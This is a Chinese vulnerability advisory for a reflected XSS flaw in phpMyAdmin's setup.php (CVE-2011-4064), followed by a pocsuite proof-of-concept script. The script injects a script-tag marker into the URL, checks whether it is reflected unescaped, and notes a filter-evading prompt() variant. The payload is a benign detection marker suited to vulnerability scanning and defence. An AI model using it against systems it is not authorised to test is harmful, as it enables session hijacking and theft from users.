Bugtraq ID: 50175
CVE ID: CVE-2011-4064
phpMyAdmin是一款基于PHP的MySQL管理程序。
部分传递给setup.php的输入在返回用户之前缺少过滤,攻击者构建恶意链接,诱使用户解析,可导致恶意脚本在目标用户浏览器上执行,可获得目标用户敏感信息或劫持用户会话。
如果存在配置目录并可写,那么XSS负载可保存在此目录中。
phpMyAdmin 3.x
厂商解决方案
phpMyAdmin 3.4.6已经修复此漏洞,建议用户下载使用:
http://www.phpmyadmin.net/
#!/usr/bin/env python
# coding: utf-8
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
import requests
'''
Original exploit link (as given in the report):
http://www.example.com/phpMyAdmin-2.11.1/scripts/setup.php?>'"><script>alert('xss');</script>
Following WVS, prompt() is used instead of alert() to partly evade filtering,
and a distinctive marker string is matched in the response:
<script>prompt("SEBUG@TEST");</script>
'''
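class TestPOC(POCBase):
    """pocsuite PoC for the reflected XSS in phpMyAdmin's setup.php (CVE-2011-4064).

    ``_verify`` requests ``scripts/setup.php`` with a ``<script>prompt(...)``
    marker in the query string and reports the target as vulnerable only when
    that marker comes back verbatim (i.e. unescaped) in the response body.
    """
    vulID = '23110'  # ssvid
    version = '1.0'
    author = ['XXXXX']
    vulDate = ''
    createDate = '2016-01-01'
    updateDate = '2016-01-01'
    references = ['http://www.sebug.net/vuldb/ssvid-23110']
    name = 'phpMyAdmin Setup接口跨站脚本漏洞'
    appPowerLink = 'http://www.phpmyadmin.net/'
    appName = 'phpMyAdmin'
    appVersion = ''
    vulType = 'XSS'
    desc = '''
'''
    samples = ['']

    # Marker that must be reflected byte-for-byte for the check to fire; an
    # HTML-escaped echo (e.g. &lt;script&gt;) will not match, which is the point.
    _MARKER = '<script>prompt("SEBUG@TEST");</script>'
    # Install path taken from the original report.
    # NOTE(review): the advisory lists phpMyAdmin 3.x as affected while this
    # path pins a 2.11.1 directory name - confirm the path for the target layout.
    _PATH = "/phpMyAdmin-2.11.1/scripts/setup.php"

    def _verify(self):
        """Probe setup.php for unescaped reflection of the marker.

        Returns:
            Output: success with ``{'XSSInfo': {'URL': <final url>}}`` when the
            marker is reflected unescaped; fail otherwise, including when the
            HTTP request itself fails.
        """
        result = {}
        # rstrip() avoids a double slash when self.url already ends with '/'.
        vulurl = self.url.rstrip('/') + self._PATH + "?>'" + '">' + self._MARKER
        try:
            # Use the framework session (req) rather than a bare requests.get so
            # pocsuite-level settings apply; the timeout keeps a scan from hanging.
            resp = req.get(vulurl, timeout=10)
        except requests.RequestException:
            # Unreachable / erroring target is reported as "not vulnerable",
            # not as a traceback.
            return self.parse_output(result)
        # print() form works on both Python 2 and 3 (original used the py2 statement).
        print(resp.url)
        # resp.text (not .content) so the str-in-str test also works on Python 3.
        if self._MARKER in resp.text:
            result['XSSInfo'] = {'URL': resp.url}
        return self.parse_output(result)

    def _attack(self):
        """Attack mode has no extra stage for a reflected XSS; reuse the probe."""
        return self._verify()

    def parse_output(self, result):
        """Wrap a result dict in an Output: success if non-empty, fail otherwise.

        Args:
            result: dict populated by ``_verify`` (empty when nothing matched).

        Returns:
            Output: the framework result object for this PoC run.
        """
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output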
register(TestPOC)  # hand the PoC class to pocsuite's register() hook imported above